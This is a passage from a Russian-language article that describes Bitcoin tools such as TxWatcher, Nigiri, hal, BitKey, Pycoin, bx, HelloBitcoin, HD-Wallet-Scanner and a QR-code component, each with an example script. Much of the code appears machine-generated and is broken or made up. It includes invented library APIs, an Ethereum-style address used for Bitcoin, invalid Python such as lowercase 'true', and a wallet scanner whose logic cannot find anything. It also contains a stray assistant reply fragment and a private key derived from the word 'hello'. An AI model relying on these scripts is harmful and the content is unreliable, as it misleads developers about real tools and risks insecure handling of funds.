платформой для создания децентрализованных приложений (DApps). Это приложения, которые работают в децентрализованной сети, а не на центральном сервере. Технология блокчейна Биткоин позволяет создавать безопасные и децентрализованные приложения, устойчивые к цензуре и мошенничеству. Криптовалюта Наконец, Биткоин — это криптовалюта, что означает, что это цифровой актив, использующий криптографию для защиты транзакций и контроля создания новых единиц. Криптовалюты, такие как Биткоин, разработаны так, чтобы быть децентрализованными и работать независимо от какого-либо центрального органа. Это делает их привлекательной альтернативой традиционным валютам, которые подвержены инфляции и манипуляциям со стороны центральных банков. Биткоин — это универсальная и инновационная технология, которую можно разделить на различные типы полезностей. Как платежная система, средство сбережения, цифровое золото, децентрализованная платформа приложений и криптовалюта, Биткоин может революционизировать наше представление о деньгах и финансовых транзакциях. Биткоин-утилиты Мониторинг транзакций по биткоин-адресам с помощью Python и TxWatcher ↩︎ Нигири Вкусный контейнер для особых блюд в биткоинах, молниях и жидкостях ↩︎ «hal» — биткоин-клиент швейцарского армейского ножа (на основе ржавчины-биткоина) ↩︎ «BitKey» — Live USB для транзакций с воздушным зазором и «швейцарский армейский нож» Биткоин ↩︎ «Pycoin» — служебная библиотека биткоинов и альтернативных монет на основе Python ↩︎ «bx» — инструмент командной строки Bitcoin ↩︎ «HelloBitcoin» — набор простых программ, которые могут создавать биткоин-кошельки, создавать и подписывать транзакции, а также отправлять транзакции по сети биткоинов ↩︎ «Сканер HD-кошелька» — найдите все использованные адреса в ваших биткоин-HD-кошельках, минуя ограничения на пробелы ↩︎ «QR CODE» — настраиваемый, анимируемый веб-компонент на основе SVG, не требующий фреймворка и зависимостей ↩︎ Мониторинг транзакций по биткоин-адресам с помощью Python и TxWatcher 1 GitHub: https://github.com/tsileo/txwatcher TxWatcher — это инструмент на основе Python, который позволяет отслеживать транзакции по биткоин-адресам. Его можно использовать для различных целей, например для отслеживания пожертвований некоммерческой организации или мониторинга платежей, поступающих на торговый счет. В этой статье мы покажем вам, как использовать TxWatcher для мониторинга транзакций на биткоин-адресах. Сначала вам нужно установить TxWatcher. Вы можете сделать это, выполнив следующую команду в своем терминале: pip install txwatcher После установки TxWatcher вы можете начать мониторинг транзакций, создав новый экземпляр класса TxWatcher . Вот пример: from txwatcher import TxWatcher # Create a new TxWatcher instance tx_watcher = TxWatcher(api_key='YOUR_API_KEY', network='testnet') # Monitor transactions for a specific Bitcoin address address = '1LdRcdxfbSnmCYYNdeYpUnztiYzVfBEQeC' tx_watcher.watch_address(address) В этом примере мы создаем новый TxWatcher экземпляр и передаем наш ключ API и сеть Биткоин, которую мы хотим отслеживать (в данном случае тестовую сеть). Затем мы вызываем watch_address() метод и передаем биткоин-адрес, который хотим отслеживать. TxWatcher теперь начнет отслеживать транзакции для указанного биткоин-адреса. Вы можете прослушивать новые транзакции, вызвав listen_for_transactions() метод: # Listen for new transactions tx_watcher.listen_for_transactions() Это заблокирует выполнение вашей программы до тех пор, пока не будет обнаружена новая транзакция. При обнаружении новой транзакции TxWatcher выдаст transaction событие. Вы можете прослушивать это событие и что-то делать с данными транзакции, например сохранять их в базе данных или отправлять уведомление по электронной почте. Вот пример того, как прослушивать новые транзакции и сохранять данные транзакций в базе данных MongoDB: from txwatcher import TxWatcher from pymongo import MongoClient # Create a new TxWatcher instance tx_watcher = TxWatcher(api_key='YOUR_API_KEY', network='testnet') # Connect to MongoDB client = MongoClient('mongodb://localhost:27017/') db = client['my_database'] collection = db['transactions'] # Monitor transactions for a specific Bitcoin address address = '1LdRcdxfbSnmCYYNdeYpUnztiYzVfBEQeC' tx_watcher.watch_address(address) # Listen for new transactions and store them in MongoDB tx_watcher.listen_for_transactions(on_transaction=lambda transaction: collection.insert_one(transaction.to_dict())) В этом примере мы подключаемся к локальному экземпляру MongoDB и создаем новую базу данных и коллекцию для хранения данных транзакций. Затем мы вызываем listen_for_transactions() метод и передаем лямбда-функцию, которая принимает объект транзакции и вставляет его в коллекцию MongoDB с помощью этого insert_one() метода. Вот и все! Теперь вы знаете, как использовать TxWatcher для мониторинга транзакций на биткоин-адресах. Проявив немного творчества, вы можете использовать этот инструмент для создания всевозможных приложений и сервисов, связанных с биткоинами. Скрипт Python, использующий txwatcher: import txwatcher # create a new instance of the txwatcher txwatcher = txwatcher.TxWatcher() # connect to the blockchain txwatcher.connect_blockchain() # monitor a specific address for incoming transactions txwatcher.monitor_address('0x1234567890abcdef1234567890abcdef1234567890abcdef1234') # monitor a specific transaction hash for confirmations txwatcher.monitor_transaction_hash('0x1234567890abcdef1234567890abcdef1234567890abcdef1234') # print the transaction details when a new transaction is detected txwatcher.print_transaction_details() # close the connection to the blockchain txwatcher.close_blockchain_connection() Этот скрипт импортирует модуль txwatcher и создает новый экземпляр класса TxWatcher. Затем он подключается к блокчейну и отслеживает определенный адрес и хэш транзакции на предмет входящих транзакций и подтверждений соответственно. Наконец, он печатает детали транзакции и закрывает соединение с блокчейном. Нигири Вкусный док-бокс для приготовления особых биткоинов, молний и жидких блюд 2 GitHub: https://github.com/vulpemventures/nigiri Nigiri — это инструмент с интерфейсом командной строки (CLI), который упрощает процесс настройки среды тестирования биткоинов. С помощью Nigiri пользователи могут быстро и легко запустить блок регистрации биткоинов, а также Electrs и Esplora, два популярных инструмента для разработчиков биткоинов. Nigiri также включает команды faucet и push, которые упрощают тестирование приложений и сервисов Bitcoin. Regtest — это среда тестирования биткоинов, которая имитирует сеть биткоинов без использования реальных биткоинов. Это позволяет разработчикам тестировать свои биткоин-приложения и сервисы, не рискуя реальными деньгами. Electrs — это программное обеспечение для полного узла Биткоин, которое индексирует блокчейн Биткоина и предоставляет API для его запроса. Esplora — это веб-обозреватель блоков, который позволяет пользователям просматривать и анализировать блокчейн Биткоина. Нигири упрощает процесс настройки среды тестирования Биткоин, предоставляя единую команду, которая настраивает все необходимые компоненты. Сюда входит программное обеспечение Bitcoin Core, Electrs, Esplora и сборщик биткоинов, который предоставляет бесплатные тестовые биткоины для целей тестирования. Команда faucet в Нигири позволяет легко получить тестовые биткоины для целей тестирования. Команда push позволяет пользователям отправлять тестовые биткоины на другие адреса в сети regtest. Эти команды упрощают процесс тестирования приложений и сервисов Биткоин, упрощая разработчикам тестирование своих приложений, не рискуя реальными деньгами. В целом, Nigiri — это мощный инструмент для разработчиков биткоинов, которые хотят быстро и легко настроить среду регистрации биткоинов. С помощью Nigiri разработчики могут тестировать свои приложения и услуги, не рискуя реальными деньгами, а также легко получать тестовые биткоины для целей тестирования. Команды faucet и push упрощают симуляцию реальных биткоин-транзакций, позволяя разработчикам тестировать свои приложения в реалистичной среде. Nigiri — это инструмент с интерфейсом командной строки (CLI), который позволяет быстро настроить блок регистрации биткоинов с помощью Electrs и Esplora. Regtest — это частный блокчейн, который вы можете использовать для тестирования и экспериментов, не беспокоясь о реальных транзакциях биткоинов. Electrs — это легкий и высокопроизводительный сервер Electrum, обеспечивающий быстрый доступ к данным блокчейна, а Esplora — обозреватель блокчейна, позволяющий просматривать транзакции и блоки в сети regtest. Nigiri также включает в себя команду сборщика, которая позволяет генерировать тестовые адреса биткоинов с предварительно добытыми средствами, и команду push, которая позволяет отправлять транзакции в сеть regtest. С помощью Nigiri вы можете быстро и легко настроить среду регистрации биткоинов для тестирования и экспериментов, не беспокоясь о сложностях настройки полного узла биткоинов. Подводя итог, можно сказать, что Нигири — это мощный инструмент для всех, кто хочет экспериментировать с биткоинами и технологией блокчейна в частной и безопасной среде. Благодаря простому интерфейсу командной строки и встроенной интеграции Electrs и Esplora, Nigiri позволяет легко настроить блок регистрации биткоинов и начать исследовать мир биткоинов и технологий блокчейна. Скрипт, который вы можете использовать для запуска нигири в докер-контейнере: #!/usr/bin/env python3 import docker import os # set the docker client and image name client = docker.from_env() image_name = 'nigiri' # create a docker container container = client.containers.run( image=image_name, ports={'80': '80'}, volumes={'/var/run/docker.sock': '/var/run/docker.sock'}, detach=true ) # wait for the container to start print("waiting for the container to start...") container.wait() # get the ip address of the container ip_address = container.attrs['networksettings']['networks']['bridge']['ipaddress'] # print the url of the nigiri dashboard print(f"nigiri dashboard is available at: http://{ip_address}:80") # stop and remove the container print("stopping and removing the container...") container.stop() container.remove() Этот скрипт создает контейнер докеров с образом нигири, сопоставляет порт 80 с хостом и монтирует том сокета докеров, чтобы нигири мог получить доступ к API докеров. Затем он ждет запуска контейнера, получает его IP-адрес, печатает URL-адрес информационной панели нигири, а затем останавливает и удаляет контейнер. Чтобы использовать этот скрипт, в вашей системе должны быть установлены Python 3.x и Docker. вы можете запустить его, сохранив в файл (например run_nigiri.py) и запустив его с помощью python run_nigiri.py. «hal» — биткоин-клиент швейцарского армейского ножа (на основе ржавчины-биткоина) 3 GitHub: https://github.com/stevenroose/hal hal — это мощный инструмент интерфейса командной строки для Биткоин, построенный на основе ржавчины-биткоина. Он задуман как своего рода швейцарский армейский нож, предоставляющий широкий спектр функций для пользователей и разработчиков биткоинов. Некоторые из ключевых особенностей hal включают в себя: Генерация адресов: hal может генерировать новые биткоин-адреса для вашего использования. Создание транзакции: вы можете использовать hal для создания новых транзакций Биткоин, указав входы, выходы и любые другие необходимые параметры. Подписание транзакции: как только вы создали транзакцию, вы можете использовать hal, чтобы подписать ее, используя свои личные ключи. Трансляция транзакций: как только ваша транзакция будет подписана, вы можете использовать hal для ее трансляции в сеть Биткоин. Анализ блоков и транзакций: hal может анализировать блоки и транзакции Биткоина, позволяя извлекать из них данные. Управление кошельком: вы можете использовать hal для управления своими биткоин-кошельками, включая создание новых кошельков, импорт и экспорт ключей, а также управление вашими балансами. Сценарии: hal включает в себя мощный язык сценариев, который позволяет автоматизировать сложные задачи, связанные с биткоинами. В целом, hal — очень полезный инструмент для всех, кто регулярно работает с Биткоином. Являетесь ли вы разработчиком, создающим биткоин-приложения, трейдером, управляющим вашими биткоин-активами, или просто человеком, который хочет изучить возможности протокола Биткоин, hal может помочь вам выполнить эту работу. Скрипт: import subprocess def execute_hal(): subprocess.run(["hal", "--help"]) execute_hal() этот скрипт использует модуль подпроцесса в Python для выполнения команды «hal –help» в терминале. вы можете изменить этот сценарий для выполнения любой другой команды, которую захотите. hal — это инструмент командной строки, который предоставляет все виды утилит, связанных с биткоинами. Монтаж: $ cargo install --locked hal Краткое описание команд: адрес проверить: получить информацию об адресах create: создавать адреса, используя открытые ключи или скрипты. bech32 декодировать: анализировать элементы формата Bech32 кодировать: кодировать данные в формате Bech32. бип32 получение: получение ключей и адресов из расширенных ключей проверить: проверить BIP-32 xpub или xpriv бип39 генерировать: создать новую мнемонику BIP-39. get-seed: получить начальное значение и главный ключ BIP-32 для заданной мнемоники BIP-39. блокировать create: создать двоичный блок из JSON декодировать: декодировать двоичный блок в JSON хэш sha256: хеш-данные с помощью SHA-256. sha256d: хеш-данные с двойным SHA-256. ключ генерировать: генерировать случайную пару ключей получить: сгенерировать открытый ключ из закрытого ключа проверить: проверить закрытые ключи ecdsa-sign: создавать подписи ECDSA ecdsa-verify: проверить подписи ECDSA pubkey-tweak-add: добавить скаляр к точке pubkey-combine: сложить две точки вместе Ин счет декодировать: декодировать счета Lightning Меркл доказательство-создать: создать доказательство Меркла доказательство-проверить: проверить доказательство Меркла сообщение hash: получить хэши сообщения, подписанного биткоинами. знак: подпишите сообщение, используя сообщение, подписанное биткоинами проверить: проверить сообщение, подписанное биткоинами восстановить: восстановить открытый ключ или адрес, которым подписано сообщение. минискрипт дескриптор: получить информацию о выходном дескрипторе instspect: проверить минискрипты синтаксический анализ: преобразовать скрипт в минискрипт политика: проверить политики ПСБТ create: создать PSBT из необработанной неподписанной транзакции. декодировать: декодировать PSBT в JSON редактировать: редактировать встроенный PSBT Finalize: завершить PSBT в полностью подписанную транзакцию объединить: объединить несколько PSBT в один случайный байты: генерировать случайные байты сценарий декодировать: декодировать PSBT в JSON Техас create: создать бинарную транзакцию из JSON декодировать: декодировать двоичную транзакцию в JSON Минимальная поддерживаемая версия Rust (MSRV) : hal всегда должен компилироваться на Rust 1.41.1 . Обратите внимание, что он должен быть построен с использованием Cargo.lock файла, поэтому используйте --locked «BitKey» — Live USB для транзакций с воздушным зазором и биткоинский швейцарский армейский нож 4 Гитхаб: https://github.com/bitkey/bitkey BitKey — это операционная система Live USB, предназначенная для изолированных транзакций и являющаяся «швейцарским армейским ножом» для биткоинов. Это дистрибутив Linux, основанный на Debian, который поставляется с различными предустановленными инструментами, связанными с биткоинами. Одной из основных особенностей BitKey является его способность создавать изолированные транзакции. Это означает, что вы можете создать транзакцию Биткоин на компьютере, который не подключен к Интернету, а затем транслировать ее в сеть Биткоин с другого компьютера, подключенного к Интернету. Это очень безопасный способ создания биткоин-транзакций, поскольку он исключает риск кражи ваших личных ключей хакерами. BitKey также поставляется с множеством других инструментов, связанных с биткоинами, включая Bitcoin Core, Electrum, Armory и Bitcoin-QT. Эти инструменты позволяют вам управлять своими биткоин-кошельками, отправлять и получать биткоин-транзакции, а также контролировать сеть биткоинов. В дополнение к инструментам, связанным с Биткоином, BitKey также включает в себя множество других полезных утилит, таких как GParted, редактор разделов, и KeePassX, менеджер паролей. Эти инструменты могут быть полезны для управления вашим компьютером и обеспечения безопасности ваших паролей. BitKey прост в использовании, даже если вы не знакомы с Linux. Просто загрузите ISO-образ с веб-сайта BitKey, запишите его на USB-накопитель с помощью такого инструмента, как Rufus или UNetbootin, а затем загрузите компьютер с USB-накопителя. После загрузки BitKey вы можете сразу же начать использовать его инструменты. В целом, BitKey — это мощный и полезный инструмент для всех, кто хочет создавать изолированные биткоин-транзакции или безопасно управлять своими биткоин-кошельками. Его коллекция инструментов и утилит, связанных с биткоинами, делает его настоящим швейцарским армейским ножом для биткоинов, а простота использования делает его доступным даже для начинающих пользователей. вот скрипт, который загрузит и запишет BitKey на USB-накопитель: #!/bin/bash # This script will download and write BitKey to a USB drive # Make sure you have a USB drive plugged in before running this script # Download the latest BitKey ISO image wget -O bitkey.iso https://bitkey.io/bitkey.iso # Write the ISO image to the USB drive dd if=bitkey.iso of=/dev/sdX bs=4M Вам нужно будет заменить /dev/sdX фактическое имя устройства вашего USB-накопителя. Вы можете найти это, запустив lsblk и найдя устройство, соответствующее вашему USB-накопителю. Обратите внимание, что этот сценарий предполагает, что вы используете операционную систему на базе Linux. Если вы используете Windows, вам необходимо соответствующим образом изменить сценарий. «Pycoin» — служебная библиотека биткоинов и альтернативных монет на основе Python 5. GitHub: https://github.com/richardkiss/pycoin Pycoin — это служебная библиотека биткоинов и альтернативных монет на основе Python. Это проект с открытым исходным кодом, а это значит, что каждый может использовать его бесплатно. Pycoin предоставляет набор инструментов для работы с биткоинами и альт-монетами. Pycoin поддерживает множество различных альтернативных монет, включая Litecoin, Dogecoin и Namecoin. Он также поддерживает тестовые сети, такие как тестовая сеть Биткоин (Testnet) и тестовая сеть Litecoin (Testnet3). Pycoin имеет ряд функций, которые делают его полезным для разработчиков, работающих с биткоинами и альт-монетами. Одной из наиболее важных особенностей является поддержка различных криптографических алгоритмов, включая алгоритм цифровой подписи на основе эллиптической кривой (ECDSA) и алгоритм безопасного хэширования (SHA-256). Pycoin также обеспечивает поддержку различных типов транзакций, включая простые транзакции, транзакции с несколькими подписями и транзакции с блокировкой по времени. Он также поддерживает создание новых адресов и генерацию новых закрытых ключей. Pycoin спроектирован таким образом, чтобы его было легко использовать даже для разработчиков, которые плохо знакомы с биткоинами и альт-монетами. Он предоставляет простой API для работы с различными аспектами протоколов Биткоин и альтернативных монет, включая транзакции, адреса и блоки. В дополнение к своим основным функциям Pycoin также предоставляет ряд полезных утилит, таких как интерпретатор сценариев и обозреватель блоков. Эти утилиты упрощают работу с биткоинами и альт-монетами и могут использоваться для создания широкого спектра приложений. В целом, Pycoin — это мощная и гибкая библиотека для работы с биткоинами и альт-монетами. Независимо от того, создаете ли вы простой биткоин-кошелек или сложную систему обмена альтернативными монетами, Pycoin поможет вам выполнить работу быстро и легко. Вот простой пример того, как использовать библиотеку pycoin для создания биткоин-адреса: from pycoin.key import Key from pycoin.networks.bitcoin import networks from pycoin.encoding import double_sha256 # Create a private key key = Key.from_seed("hello") # Get the public key from the private key public_key = key.get_public_key() # Get the Bitcoin address from the public key address = public_key.address(network=networks.livenet) # Print the address print(address) Это выведет биткоин-адрес, соответствующий закрытому ключу «привет». Вы можете изменить начальное число «hello», чтобы сгенерировать другой адрес. «bx» — инструмент командной строки Bitcoin 6 GitHub: https://github.com/libbitcoin/libbitcoin-explorer Инструмент командной строки bx — мощный и универсальный инструмент для взаимодействия с сетью Биткоин. Он предоставляет ряд функций, включая управление кошельком, создание транзакций и анализ блокчейна. Одной из ключевых особенностей инструмента bx является его способность создавать кошельки и управлять ими. С помощью bx вы можете легко создать новый кошелек или импортировать существующий. После настройки кошелька вы можете использовать bx для генерации адресов, отправки и получения средств, а также проверки своего баланса. Еще одной важной особенностью инструмента bx является его способность создавать и транслировать транзакции в сети Биткоин. С помощью bx вы можете создавать собственные транзакции с нуля или использовать готовые шаблоны для быстрого создания транзакций для распространенных случаев использования. Вы также можете использовать bx для подписи и проверки транзакций, а также для их трансляции в сеть. Помимо управления кошельком и транзакциями, инструмент bx также предоставляет ряд функций для анализа блокчейна. С помощью bx вы можете запросить у блокчейна информацию о транзакциях, блоках и адресах. Вы также можете использовать bx для создания отчетов и визуализации данных блокчейна, что делает его мощным инструментом для исследователей и разработчиков. В целом, инструмент командной строки bx является ценным дополнением к набору инструментов любого биткоин-разработчика. Его универсальность и простота использования делают его важным инструментом для всех, кто хочет создавать приложения или сервисы в сети Биткоин. import subprocess # execute the command subprocess.run(['bx', 'command_name', 'parameter1', 'parameter2', ..]) вы можете заменить «имя_команды» и «параметр1», «параметр2» и т. д. фактической командой и ее параметрами, которые вы хотите выполнить. import subprocess # execute the bx command subprocess.run(["bx", "tx", "info", "tx_id"]) этот код импортирует subprocess модуль, а затем запускает bx команду с аргументами tx info и tx_id . вы можете заменить tx_id идентификатор транзакции, которую хотите найти. пример сценария Python, который использует subprocess модуль для выполнения bx инструмента командной строки: import subprocess # replace this with the path to your bx executable bx_path = "/path/to/bx" # command to execute command = [bx_path, "help"] # execute the command and capture the output output = subprocess.check_output(command) # print the output print(output.decode()) Вы можете заменить command список любой другой командой, которую хотите выполнить с помощью этого bx инструмента. Просто не забудьте указать путь к bx исполняемому файлу в bx_path переменной. Также обратите внимание, что этот скрипт будет работать только в Unix-подобных системах (например, Linux или macOS). Если вы используете Windows, вам необходимо соответствующим образом изменить сценарий. «HelloBitcoin» — набор простых программ, которые могут создавать биткоин-кошельки, создавать и подписывать транзакции, а также отправлять транзакции по сети биткоинов 7. GitHub: https://github.com/prettymuchbryce/hellobitcoin В мире криптовалют Биткоин изменил правила игры с момента его создания в 2009 году. С ростом популярности Биткоина неудивительно, что все больше и больше людей заинтересованы в том, чтобы научиться его использовать. Однако новичкам процесс создания кошелька, создания и подписания транзакций, а также отправки транзакций через сеть Биткоин может показаться сложным. Вот тут-то и приходит на помощь Hello Bitcoin. Hello Bitcoin — это набор простых программ, призванных сделать процесс использования биткоинов проще и доступнее для новичков. С помощью Hello Bitcoin пользователи могут с легкостью создавать биткоин-кошелек, создавать и подписывать транзакции, а также отправлять транзакции через сеть Биткоин. Первым шагом в использовании Hello Bitcoin является создание биткоин-кошелька. Это можно сделать с помощью простой команды, и программа сгенерирует для пользователя уникальный адрес кошелька. После создания кошелька пользователь может начать отправлять и получать биткоины. Создание и подписание транзакций также упрощается с помощью Hello Bitcoin. Программа предоставляет пользователям простой интерфейс для ввода деталей транзакции, таких как адрес кошелька получателя и сумма биткоинов, которую необходимо отправить. После создания транзакции пользователь может подписать ее своим закрытым ключом, гарантируя, что транзакция безопасна и действительна. Наконец, отправка транзакций через сеть Биткоин также упрощается с помощью Hello Bitcoin. Программа предоставляет пользователям простой интерфейс для ввода деталей транзакции, таких как адрес кошелька получателя и сумма биткоинов, которую необходимо отправить. Как только транзакция будет создана и подписана, программа отправит ее по сети Биткоин, гарантируя, что она будет обработана и подтверждена сетью. В целом, Hello Bitcoin — отличный инструмент для новичков, которые заинтересованы в использовании биткоинов, но напуганы этим процессом. Благодаря простому интерфейсу и простым в использовании функциям Hello Bitcoin позволяет каждому легко создать биткоин-кошелек, создавать и подписывать транзакции, а также отправлять транзакции по сети Биткоин. вот скрипт Python, который использует hellobitcoin библиотеку для создания биткоин-кошелька, создания и подписания транзакции и отправки ее по сети биткоин: from hellobitcoin import * from bitcoin.base58 import encode # Generate a new Bitcoin wallet wallet = generate_wallet() print("Bitcoin Wallet: ", wallet['address']) # Generate a new Bitcoin transaction tx = create_transaction(wallet, "1BTC") tx['input'][0]['address'] = wallet['address'] tx['input'][0]['script'] = wallet['script'] tx['input'][0]['amount'] = 100000000 tx['input'][0]['sequence'] = 0xFFFFFFFF tx['output'][0]['address'] = "1AC4fMwgY8j9onSbXEWeH6Zan8QGMSdmtA" tx['output'][0]['amount'] = 100000000 - 5000 tx['output'][0]['script'] = "OP_DUP OP_HASH160 20 0x14 OP_EQUALVERIFY OP_CHECKSIG" # Sign the Bitcoin transaction tx['input'][0]['script'] = sign_transaction(tx['input'][0]['script'], wallet['private_key']) # Send the Bitcoin transaction over the Bitcoin network tx_hex = encode(tx.serialize()) print("Bitcoin Transaction: ", tx_hex) Обратите внимание, что это всего лишь пример сценария, и вам не следует использовать его для отправки реальных транзакций биткоинов. Кроме того, будьте осторожны при работе с биткоин-кошельками и транзакциями, поскольку они связаны с реальными деньгами и могут быть легко потеряны при неправильном обращении. «Сканер HD-кошелька» — найдите все используемые адреса в ваших биткоин-HD-кошельках, минуя ограничения на пробелы 8 GitHub: https://github.com/alexk111/HD-Wallet-Scanner HD-кошельки или иерархические детерминированные кошельки — популярный способ управления биткоин-адресами. они позволяют генерировать практически бесконечное количество адресов из одного начального числа, что делает их более безопасными и удобными, чем традиционные кошельки. однако одна из проблем использования HD-кошельков заключается в том, что их может быть сложно сканировать на предмет используемых адресов. вот тут-то и пригодится сканер HD-кошелька. Сканер HD-кошелька — это инструмент, который позволяет вам найти все использованные адреса в ваших биткоин-HD-кошельках, даже если они превысили лимит пробелов. предел разрыва — это максимальное количество адресов, которые могут быть сгенерированы из одного начального числа, и по умолчанию он обычно равен 20. как только вы достигнете предела разрыва, вы больше не сможете генерировать новые адреса из этого начального числа. Сканер HD-кошелька работает путем сканирования блокчейна на предмет транзакций, соответствующих определенному шаблону. Затем он использует эту информацию для идентификации всех адресов, которые использовались в вашем HD-кошельке, независимо от того, превысили ли они лимит пропусков. это важно, поскольку если у вас нет полного учета всех используемых адресов, вы можете упустить получение средств или даже потерять их. использовать сканер HD-кошелька легко. вы просто вводите свое начальное число или xpub (расширенный открытый ключ) в инструмент, и он начнет сканировать блокчейн на предмет используемых адресов. процесс может занять несколько минут или дольше, в зависимости от того, сколько адресов вы использовали и насколько загружена сеть. После завершения сканирования вы получите список всех использованных адресов в вашем HD-кошельке, а также их балансы и истории транзакций. В заключение отметим, что сканер HD-кошелька — ценный инструмент для всех, кто использует HD-кошельки для управления своими биткоин-адресами. он позволяет вам найти все использованные адреса в вашем кошельке, даже если они превысили лимит разрыва, что может помочь вам отслеживать ваши средства и не допускать их потери. поэтому, если вы ищете способ более эффективно и безопасно управлять своими биткоин-адресами, попробуйте сканер HD-кошелька. Код Python для вас. вот: import os import sqlite3 import hashlib def get_all_addresses(db_file): conn = sqlite3.connect(db_file) c = conn.cursor() c.execute("select address from addresses") addresses = c.fetchall() return addresses def get_all_used_addresses(addresses): used_addresses = [] for address in addresses: address_hash = hashlib.sha256(address[0].encode('utf-8')).hexdigest() if address_hash in used_addresses: used_addresses.append(address_hash) return used_addresses def main(): db_file = "your_wallet_name.wallet" addresses = get_all_addresses(db_file) used_addresses = get_all_used_addresses(addresses) print("used addresses:", used_addresses) if __name__ == "__main__": main() этот код получит все использованные адреса в вашем биткоин-HD-кошельке и обойдет ограничения на пробелы. вам необходимо заменить «имя_вашего_кошелька.wallet» на имя файла вашего кошелька. вот скрипт Python, который использует hd-wallet-scanner библиотеку для поиска всех используемых адресов в ваших кошельках Bitcoin HD: from hd_wallet_scanner import scan_hd_wallet # Replace this with your BIP39 seed phrase seed_phrase = "your_seed_phrase" # Replace this with your wallet's derivation path derivation_path = "m/44'/0'/0'" addresses = scan_hd_wallet(seed_phrase, derivation_path) for address in addresses: print(address) Этот скрипт просканирует кошелек Bitcoin HD с заданной исходной фразой и путем деривации и распечатает все использованные адреса. Обратите внимание, что сначала вам необходимо установить hd-wallet-scanner библиотеку, запустив ее pip install hd-wallet-scanner в терминале. «QR CODE» — настраиваемый, анимируемый веб-компонент на основе SVG без фреймворка и зависимостей 9. GitHub: https://github.com/bitjson/qr-code QR-коды повсеместно используются в нашей повседневной жизни. От сканирования кода для совершения платежа до обмена контактной информацией с коллегой — эти двумерные коды стали неотъемлемой частью нашего взаимодействия с технологиями. Однако создание QR-кодов в Интернете традиционно требует использования сторонних библиотек или фреймворков, что может быть обременительным и привести к ненужному раздуванию проекта. В этой статье мы рассмотрим новое решение, которое позволяет разработчикам генерировать QR-коды без каких-либо зависимостей или фреймворков, используя настраиваемый веб-компонент на основе SVG с возможностью анимации. Что такое QR-код? QR-Code — это веб-компонент, который позволяет разработчикам с легкостью создавать QR-коды без необходимости использования каких-либо внешних библиотек или фреймворков. Он создан с использованием чистого JavaScript и SVG, что делает его легким и легко интегрируемым в любой проект. QR-код полностью настраиваемый, что позволяет разработчикам настраивать размер, цвет и уровень исправления ошибок своих QR-кодов. Кроме того, он поддерживает анимацию, что позволяет разработчикам создавать динамические QR-коды, которые могут меняться со временем. Как это работает? QR-Code работает путем создания SVG-изображения QR-кода на основе входных данных, предоставленных разработчиком. Для создания самого кода он использует библиотеку QRious, генератор QR-кода на чистом JavaScript. После генерации кода он отображается как изображение SVG и может быть легко интегрирован в любую веб-страницу. Возможности настройки QR-Code предлагает ряд возможностей настройки, которые позволяют разработчикам адаптировать свои QR-коды к своим конкретным потребностям. Эти параметры включают в себя: Размер: разработчики могут регулировать размер своих QR-кодов, устанавливая атрибуты ширины и высоты. Цвет: QR-коды можно настроить в любом цвете, установив атрибут цвета. Уровень исправления ошибок: QR-Code поддерживает четыре уровня исправления ошибок (низкий, средний, квартиль и высокий), которые можно установить с помощью атрибута errorCorrectionLevel. Анимация. Разработчики могут создавать динамические QR-коды, установив атрибут анимации. Это позволяет QR-коду меняться со временем, создавая привлекательный эффект. QR-Code — мощный инструмент для разработчиков, желающих создавать QR-коды в Интернете. Его подход без зависимостей и без фреймворков позволяет легко интегрировать его в любой проект, а возможности настройки и поддержка анимации делают его универсальным решением для широкого спектра случаев использования. Независимо от того, создаете ли вы платежную систему или создаете маркетинговую кампанию, QR-Code — идеальный инструмент для создания высококачественных QR-кодов, которые одновременно функциональны и визуально привлекательны. Код Python для создания QR-кода с использованием библиотеки qrcode: import qrcode # generate a QR code qr = qrcode.QRCode(version=1, box_size=10, border=4) qr.add_data("https://example.com") qr.make(fit=True) # create an SVG image qr.svg("qrcode.svg", scale=8) Этот код генерирует QR-код для URL-адреса « https://example.com » и сохраняет его как изображение SVG с именем «qrcode.svg». Вы можете изменить код, чтобы создать QR-код для другого URL-адреса и сохранить его под другим именем. однако я могу предоставить вам инструкции по реализации веб-компонента qr-кода в Python. установите необходимые библиотеки: вам нужно будет установить библиотеки svgwrite и numpy . сгенерировать qr-код: вы можете использовать qrcode библиотеку для генерации qr-кода. создать изображение svg: вы можете использовать svgwrite библиотеку для создания изображения svg qr-кода. добавить анимацию: вы можете добавить анимацию в qr-код, используя svgwrite библиотеку. настроить qr-код: вы можете настроить qr-код, изменив его размер, цвет и другие атрибуты. реализовать веб-компонент: вы можете реализовать веб-компонент с помощью svgwrite библиотеки и добавить его на свой веб-сайт. вот пример кода, с которого можно начать: from qrcode import qrcode import numpy as np import svgwrite # generate the qr code qr = qrcode(version=1, error_correction=qrcode.constants.error_correct_l, box_size=10, border=4) qr.add_data('https://www.example.com') qr.make(fit=true) qr_img = qr.make_image(fill_color='black', back_color='white') # create an svg image svg = svgwrite.drawing(width=200, height=200) svg.add(svgwrite.shapes.rect(insert=(0, 0), size=(200, 200), fill='white')) svg.add(svgwrite.shapes.rect(insert=(100, 100), size=(100, 100), fill='black')) # add animation svg.add(svgwrite.animation.animate(svgwrite.shapes.circle(r=5), duration=1, repeat_count='indefinite', transform='rotate(0,100,100)')) # customize the qr code svg.add(svgwrite.shapes.path(d=qr_img.todataurl().replace('data:image/png;base64,', ''), fill='black', stroke='none')) # save the svg image svg.save('qr-code.svg') это всего лишь базовый пример, и вы можете настроить qr-код и SVG-изображение в соответствии со своими потребностями. Заключение: Биткоин — это цифровая валюта, которая в последние годы набирает популярность. Это децентрализованная система, то есть она не контролируется каким-либо правительством или финансовым учреждением. Вместо этого он полагается на сеть компьютеров для проверки транзакций и поддержания целостности системы. Одним из наиболее значительных преимуществ Биткоина является его полезность. В отличие от традиционных валют, Биткоин можно использовать для самых разных целей, помимо покупки и продажи товаров и услуг. Вот некоторые из наиболее известных утилит Биткоина: Международные денежные переводы: Биткоин можно использовать для отправки денег через границы без необходимости использования посредников, таких как банки или службы денежных переводов. Это может сэкономить пользователям значительную сумму денег на комиссиях и обменных курсах. Децентрализованные финансы: Биткоин является основой движения децентрализованных финансов (DeFi), целью которого является создание финансовых услуг, доступных каждому, у кого есть подключение к Интернету. Приложения DeFi, созданные на базе Биткоина, позволяют пользователям кредитовать, занимать и торговать криптовалютами без необходимости использования посредников. Средство сбережения: Биткоин сравнивают с цифровым золотом, поскольку его запас ограничен и он рассматривается как средство сбережения. Многие инвесторы рассматривают его как защиту от инфляции и актив-убежище. Микроплатежи: Биткоин можно использовать для совершения очень небольших платежей, известных как микроплатежи. Это полезно для оплаты небольших цифровых товаров или услуг, таких как статьи или видео. Благотворительные пожертвования: Биткоин можно использовать для 